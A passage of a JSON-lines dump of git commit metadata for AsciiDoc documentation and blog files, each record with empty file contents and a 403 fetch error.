2016-10-06-Blockchain-for-healthcare-industry.adoc","repos":"pramodjg\/articles,pramodjg\/articles,pramodjg\/articles,pramodjg\/articles","old_file":"_posts\/2016-10-06-Blockchain-for-healthcare-industry.adoc","new_file":"_posts\/2016-10-06-Blockchain-for-healthcare-industry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pramodjg\/articles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"560a17a72305c416bd7b4f0020c6c64ac76d51b9","subject":"Worked on IIS log file documentation","message":"Worked on IIS log file documentation\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/Microsoft IIS W3C extended log file format.asciidoc","new_file":"documentation\/Microsoft IIS W3C extended log file format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7c7d4a1203d4869713ec2d912dadb3f43c60bdb","subject":"[docs] Improvements to multi-master migration doc","message":"[docs] Improvements to multi-master migration doc\n\n- Add extra reminder to run as the Kudu user.\n\n- Note that the copy_from_remote command requires authenticating\n to the remote service as the Kudu user.\n\n- Note that the workflow can be used to migrate 2->3 masters by\n making straightforward adjustments to the procedure.\n\n- Move steps for verifying the migration was successful to a new\n section so they are more noticeable.\n\nChange-Id: I77ef796f8b35729871ef8ddf2b635989278c2ebc\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9466\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Will Berkeley 
<c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\n","repos":"cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8af997aa4c87c38958e3bb19fdfd3dcbeaea267","subject":"Fixes #1002 add snippet on hot reload","message":"Fixes #1002 add snippet on hot reload\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/topics\/live-coding.adoc","new_file":"docs\/src\/main\/asciidoc\/topics\/live-coding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2580133071a1ed20794033bdf56a28f87240e923","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdf763746c18a8d60375b5ac84f7650a4a2e9d3d","subject":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a72c322bb6265c7987d0475cb50313370749f79f","subject":"Add examples for quote macro","message":"Add examples for quote 
macro\n","repos":"jxxcarlson\/asciidoctor-latex,asciidoctor\/asciidoctor-latex,asciidoctor\/asciidoctor-latex,jxxcarlson\/asciidoctor-latex,jxxcarlson\/asciidoctor-latex,asciidoctor\/asciidoctor-latex","old_file":"try-out\/quote.adoc","new_file":"try-out\/quote.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/asciidoctor-latex.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3968597cda53e1f1c431490a93d4a8b0e9d97bcd","subject":"Update 2009-12-20-Miles-Davis-The-Original-Scrum-Master.adoc","message":"Update 2009-12-20-Miles-Davis-The-Original-Scrum-Master.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2009-12-20-Miles-Davis-The-Original-Scrum-Master.adoc","new_file":"_posts\/2009-12-20-Miles-Davis-The-Original-Scrum-Master.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e387b90c798cfcf6b0fae7e292fc6caf722ac716","subject":"y2b create post Unboxing Every iPhone 7 \\u0026 iPhone 7 Plus","message":"y2b create post Unboxing Every iPhone 7 \\u0026 iPhone 7 Plus","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-18-Unboxing-Every-iPhone-7-u0026-iPhone-7-Plus.adoc","new_file":"_posts\/2016-09-18-Unboxing-Every-iPhone-7-u0026-iPhone-7-Plus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f86f54103be3668a19abee518eee01f6d023ed5a","subject":"y2b create post THE CRAZIEST HEADPHONES EVER","message":"y2b create post THE CRAZIEST HEADPHONES EVER","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-21-THE%20CRAZIEST%20HEADPHONES%20EVER.adoc","new_file":"_posts\/2017-12-21-THE%20CRAZIEST%20HEADPHONES%20EVER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e7749c686fcf6f1f14f6a18d3e924f5d2ab3bf1","subject":"Very initial Yesod for Haskellers","message":"Very initial Yesod for Haskellers\n","repos":"mlitchard\/lambdaweb.com-content,wolftune\/yesodweb.com-content,maxigit\/yesodweb.com-content,maxigit\/yesodweb.com-content,wolftune\/yesodweb.com-content","old_file":"book\/yesod-for-haskellers.asciidoc","new_file":"book\/yesod-for-haskellers.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wolftune\/yesodweb.com-content.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"109f65c6792391664f45df796d57b56e9270de21","subject":"Update 2015-03-27-Who-using-HubPress-in-Japan.adoc","message":"Update 
2015-03-27-Who-using-HubPress-in-Japan.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-03-27-Who-using-HubPress-in-Japan.adoc","new_file":"_posts\/2015-03-27-Who-using-HubPress-in-Japan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"497c7c00eb1db17893087135bd1be925cc74ee1e","subject":"y2b create post World's Thinnest Phone! (Oppo R5 Unboxing)","message":"y2b create post World's Thinnest Phone! (Oppo R5 Unboxing)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-12-27-Worlds-Thinnest-Phone-Oppo-R5-Unboxing.adoc","new_file":"_posts\/2014-12-27-Worlds-Thinnest-Phone-Oppo-R5-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62412fa6332a378007d77d6a732b69b0df97a0b5","subject":"Update 2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","message":"Update 2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","new_file":"_posts\/2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d4b361c3a01b8bcf3db141e19f4e791ffa3a61d","subject":"Update 2016-05-08-Stop-Configuring-in-Chef-Compile-Phase.adoc","message":"Update 2016-05-08-Stop-Configuring-in-Chef-Compile-Phase.adoc","repos":"amberry\/blog,amberry\/blog,amberry\/blog,amberry\/blog","old_file":"_posts\/2016-05-08-Stop-Configuring-in-Chef-Compile-Phase.adoc","new_file":"_posts\/2016-05-08-Stop-Configuring-in-Chef-Compile-Phase.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/amberry\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59d6d8be0635f82502b1fc5e943cb2bc74f26bc1","subject":"Add initial application health docs","message":"Add initial application health docs\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"using_openshift\/application_health.adoc","new_file":"using_openshift\/application_health.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"310f22367f2a2d520a5190cf511a0649796d2503","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","message":"Update 
2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a77a34dbd03865fb787b396d2852516d41106dc4","subject":"OGM-873 Documentation","message":"OGM-873 Documentation\n","repos":"DavideD\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm-cassandra,hibernate\/hibernate-ogm,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm,schernolyas\/hibernate-ogm,Sanne\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,mp911de\/hibernate-ogm,gunnarmorling\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm-contrib","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/redis.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/redis.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"bbc944882676f4b02aad43c239ee637d360ebfcf","subject":"Update 2018-07-28-the-one-true-thing.adoc","message":"Update 2018-07-28-the-one-true-thing.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-07-28-the-one-true-thing.adoc","new_file":"_posts\/2018-07-28-the-one-true-thing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8edac11911e6e8d7e35ea3d9f8fcc625a184990","subject":"android blog contribution","message":"android blog contribution\n","repos":"droolsjbpm\/optaplanner-website,bibryam\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"blog\/2015-05-17-OptaPlannerOnAndroid.adoc","new_file":"blog\/2015-05-17-OptaPlannerOnAndroid.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"96334a4e881e09173c8455dee354d13dd08daa69","subject":"add 
mso4sc","message":"add mso4sc\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_posts\/2017-09-01-fud5-day4.adoc","new_file":"_posts\/2017-09-01-fud5-day4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b402576c124196b7302ea71ad184de704345d91","subject":"Update 2016-12-03-NCC-Group-Internship.adoc","message":"Update 2016-12-03-NCC-Group-Internship.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-03-NCC-Group-Internship.adoc","new_file":"_posts\/2016-12-03-NCC-Group-Internship.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c6ef3238f5a6abeb2913ffb5a4dfaa015b3a061","subject":"add CI github actions","message":"add CI github actions\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"DevOps\/CI-github-actions.adoc","new_file":"DevOps\/CI-github-actions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46a953a38d1a5f03307c0a98e29cf5b81cd49732","subject":"Update 2016-04-16-google-analytics-with-google-apps-script2.adoc","message":"Update 2016-04-16-google-analytics-with-google-apps-script2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script2.adoc","new_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eed269bb312652e6d75007a9be2441d4efa14028","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1f3bd00d81e35b20ec27f3e1ef3ca2cebe9ac67","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 
2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a7852db9b8ef1d8d6ea0fb5ddd90b09b991d2c6","subject":"Update 2016-08-26-guidelines-with-google-apps-script.adoc","message":"Update 2016-08-26-guidelines-with-google-apps-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57df16ed1ee912b5289df326e1b326bb85454a88","subject":"Update 2016-01-06-Introducing-the-New-bGC2-Site.adoc","message":"Update 2016-01-06-Introducing-the-New-bGC2-Site.adoc","repos":"duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse","old_file":"_posts\/2016-01-06-Introducing-the-New-bGC2-Site.adoc","new_file":"_posts\/2016-01-06-Introducing-the-New-bGC2-Site.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/duggiemitchell\/JavascriptMuse.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4c1fbc5f34bc120b311282df809b2aaccb5a638","subject":"y2b create post $8 Headphones Vs. $80 Beats Headphones","message":"y2b create post $8 Headphones Vs. 
$80 Beats Headphones","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-20-8-Headphones-Vs-80-Beats-Headphones.adoc","new_file":"_posts\/2017-03-20-8-Headphones-Vs-80-Beats-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54a500fef40f5dd9b0137755602969051c50e2a8","subject":"y2b create post The Best 9 Dollars You'll Ever Spend...","message":"y2b create post The Best 9 Dollars You'll Ever Spend...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-11-The-Best-9-Dollars-Youll-Ever-Spend.adoc","new_file":"_posts\/2017-11-11-The-Best-9-Dollars-Youll-Ever-Spend.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf762b611c093d7918debc34755ef3bd9d9346d5","subject":"second step into an asciidoc user guide","message":"second step into an asciidoc user guide\n","repos":"Poundex\/open-dolphin,Poundex\/open-dolphin,canoo\/open-dolphin,nagyistoce\/open-dolphin,canoo\/open-dolphin,Poundex\/open-dolphin,janih\/open-dolphin,janih\/open-dolphin,DaveKriewall\/open-dolphin,nagyistoce\/open-dolphin,nagyistoce\/open-dolphin,Poundex\/open-dolphin,DaveKriewall\/open-dolphin,DaveKriewall\/open-dolphin,nagyistoce\/open-dolphin,janih\/open-dolphin,gemaSantiago\/open-dolphin,canoo\/open-dolphin,janih\/open-dolphin,DaveKriewall\/open-dolphin,gemaSantiago\/open-dolphin,gemaSantiago\/open-dolphin,canoo\/open-dolphin,gemaSantiago\/open-dolphin","old_file":"subprojects\/documentation\/src\/docs\/asciidoc\/OpenDolphin.adoc","new_file":"subprojects\/documentation\/src\/docs\/asciidoc\/OpenDolphin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/janih\/open-dolphin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b0a83bc8b4f52ec315ab232415368a602deeaf87","subject":"Update 2016-05-17-Hbase.adoc","message":"Update 2016-05-17-Hbase.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2016-05-17-Hbase.adoc","new_file":"_posts\/2016-05-17-Hbase.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"757e4726fd97850df806134011c37e46d7c61d15","subject":"Update 2017-07-28-mecab.adoc","message":"Update 2017-07-28-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-mecab.adoc","new_file":"_posts\/2017-07-28-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a3ef906d79caad345361ebb6d717039b01b912e","subject":"systemd configuration examples","message":"systemd configuration examples\n\nSigned-off-by: Thomas Sj\u00f6gren <9ff28d1cb1d19283ed3327b40df6c7d62d8bc343@users.noreply.github.com>\n","repos":"konstruktoid\/hardening,konstruktoid\/hardening","old_file":"systemd.adoc","new_file":"systemd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/konstruktoid\/hardening.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d06c6177dc13c4e31440b65288f4fdbf299ca1be","subject":"Update 2018-07-03-vr-lt.adoc","message":"Update 2018-07-03-vr-lt.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-03-vr-lt.adoc","new_file":"_posts\/2018-07-03-vr-lt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06957adc6552f3c150a884a116cb9aec49fbac78","subject":"Update 2013-03-02-Eclipse-Juno-SR2-peut-etre-enfin-une-version-rapide.adoc","message":"Update 2013-03-02-Eclipse-Juno-SR2-peut-etre-enfin-une-version-rapide.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2013-03-02-Eclipse-Juno-SR2-peut-etre-enfin-une-version-rapide.adoc","new_file":"_posts\/2013-03-02-Eclipse-Juno-SR2-peut-etre-enfin-une-version-rapide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a081167a831de7e617cea18541174561989da14e","subject":"Update 2017-10-08-Acemice-Belki-Hadsizce-8.adoc","message":"Update 2017-10-08-Acemice-Belki-Hadsizce-8.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-10-08-Acemice-Belki-Hadsizce-8.adoc","new_file":"_posts\/2017-10-08-Acemice-Belki-Hadsizce-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c032c3fea5c39ac40c1757f70a404e077d96118d","subject":"y2b create post Google Pixel 2 and Pixel 2 XL Hands On!","message":"y2b create post Google Pixel 2 and Pixel 2 XL Hands On!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-04-Google-Pixel-2-and-Pixel-2-XL-Hands-On.adoc","new_file":"_posts\/2017-10-04-Google-Pixel-2-and-Pixel-2-XL-Hands-On.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"723f18a31fd616501405524bbdcf932f4b8bac5d","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 
2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0f3712a7b35cfb71fe0618d0dd6fe899af5f665","subject":"Update 2018-10-05-E-K-S.adoc","message":"Update 2018-10-05-E-K-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-05-E-K-S.adoc","new_file":"_posts\/2018-10-05-E-K-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ffa72b226bb9aa34a87ee298c81a38a8daa4982","subject":"add CHANGELOG; populate with changes from all past releases","message":"add CHANGELOG; populate with changes from all past 